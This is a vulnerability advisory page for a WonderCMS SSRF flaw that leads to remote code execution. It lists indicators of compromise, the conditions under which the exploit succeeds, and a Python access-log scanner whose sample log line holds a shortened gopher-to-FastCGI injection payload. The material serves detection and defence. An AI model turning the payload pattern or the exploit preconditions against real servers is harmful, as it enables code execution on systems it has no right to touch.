CVE-2020-35313
published 2021-04-20


Priority P270 · critical · 9.8 (CVSS 3.1)
Exploit available
EPSS: 45.22% (98.6th percentile)
A server-side request forgery (SSRF) vulnerability in the addCustomThemePluginRepository function in index.php in WonderCMS 3.1.3 allows remote attackers to execute arbitrary code via a crafted URL to the theme/plugin installer.

Affected (1 range)

Vendor      Product     Version range   Fixed in
wondercms   wondercms

Detection & IOCs (extracted from sources)

url: http://wonder.com/login
path: /index.php
url: ?installThemePlugin=<payload>&type=plugins&token=<token>
port: 9000
  • Monitor HTTP GET requests to index.php containing the query parameter 'installThemePlugin' with a gopher:// scheme URI, which is the attack delivery vector for this SSRF-to-RCE chain.
  • Detect outbound or loopback gopher:// scheme requests targeting 127.0.0.1:9000, indicative of SSRF abuse against a local FastCGI (PHP-FPM) listener.
  • Alert on the presence of the string 'Made-by-SpyD3r' in HTTP request bodies or URL-encoded payloads, which is a unique marker embedded in the FastCGI exploit payload.
  • Detect FastCGI PHP_VALUE injection attempts setting 'allow_url_include = On' and 'auto_prepend_file = php://input', which enables arbitrary PHP code execution via the gopher SSRF payload.
  • The exploit requires an authenticated session; monitor for POST login attempts to WonderCMS followed immediately by GET requests with 'installThemePlugin' parameter as a behavioral chain indicator.
  • The vulnerable function is addCustomThemePluginRepository in index.php; audit WAF/application logs for unsanitized URL values passed to the theme/plugin installer endpoint.
  • The gopher-based FastCGI payload hardcodes SCRIPT_FILENAME as /usr/share/php/PEAR.php; this path must exist on the target system for the RCE stage to succeed. Targets without PEAR installed at this path will not be exploitable via this specific payload.
  • Exploitation requires FastCGI (PHP-FPM) to be listening on localhost port 9000. Environments using a Unix socket or a non-default port will not be vulnerable to this specific exploit chain.
  • The exploit requires valid CMS credentials; unauthenticated attackers cannot trigger the SSRF directly. Credential compromise is a prerequisite.
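As an added example (not part of the CVE record or of the WonderCMS project), the following Python turns the detection bullets above into one access-log check: it decodes the installThemePlugin parameter, flags a gopher:// target on loopback port 9000, the PHP_VALUE/auto_prepend_file injection and the Made-by-SpyD3r marker, and notes when the same client POSTed to index.php earlier in the log. The log format, IP addresses and the shortened payload fragment are constructed for the demo.

```python
"""Added example (not part of the CVE record or WonderCMS): flag access-log lines that match
the SSRF-to-RCE chain in the detection notes above. Log lines and payload fragment are constructed."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

SAMPLE_LOG = """\
10.0.0.5 - - [20/Apr/2021:10:01:02 +0000] "POST /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [20/Apr/2021:10:01:09 +0000] "GET /index.php?installThemePlugin=gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2509KPHP_VALUEauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250AMade-by-SpyD3r%2500&type=plugins&token=abc HTTP/1.1" 200 99 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Apr/2021:10:02:00 +0000] "GET /index.php?installThemePlugin=https%3A%2F%2Fgithub.com%2Fexample%2Fplugin&type=plugins&token=abc HTTP/1.1" 200 99 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)')
LOOPBACK = {"127.0.0.1", "localhost", "::1", "0.0.0.0"}

def analyse_target(target):
    """Return detection reasons for one request target (empty list if clean)."""
    reasons = []
    parts = urlsplit(target)
    if not parts.path.endswith("/index.php"):
        return reasons
    for raw in parse_qs(parts.query).get("installThemePlugin", []):
        inner = urlsplit(raw)  # parse_qs already stripped one encoding layer
        scheme = inner.scheme.lower()
        if scheme not in ("http", "https"):  # the installer should only fetch http(s) repositories
            reasons.append(f"non-http(s) scheme '{scheme}' in installThemePlugin")
        if scheme == "gopher" and inner.hostname in LOOPBACK and inner.netloc.endswith(":9000"):
            reasons.append("gopher:// to loopback FastCGI port 9000 (SSRF to PHP-FPM)")
        decoded = unquote(raw)  # second decoding layer exposes the FastCGI record text
        if "PHP_VALUE" in decoded and "auto_prepend_file" in decoded:
            reasons.append("FastCGI PHP_VALUE injection setting auto_prepend_file")
        if "Made-by-SpyD3r" in decoded:
            reasons.append("known payload marker 'Made-by-SpyD3r'")
    return reasons

def scan_log(text):
    """Return [(ip, timestamp, reasons)] for suspicious installer requests, noting a prior login POST."""
    hits, posted = [], set()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if m["method"] == "POST" and urlsplit(m["target"]).path.endswith("/index.php"):
            posted.add(m["ip"])  # remember clients that POSTed (login) to index.php
            continue
        reasons = analyse_target(m["target"])
        if reasons and m["ip"] in posted:
            reasons.append("preceded by POST to index.php from the same IP (login -> installer chain)")
        if reasons:
            hits.append((m["ip"], m["ts"], reasons))
    return hits
```

Calling scan_log(SAMPLE_LOG) flags only the 10.0.0.5 installer request, with all four reasons attached; the benign https:// plugin URL from 10.0.0.9 is not reported.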

CVSS provenance

NVD, v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD, v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P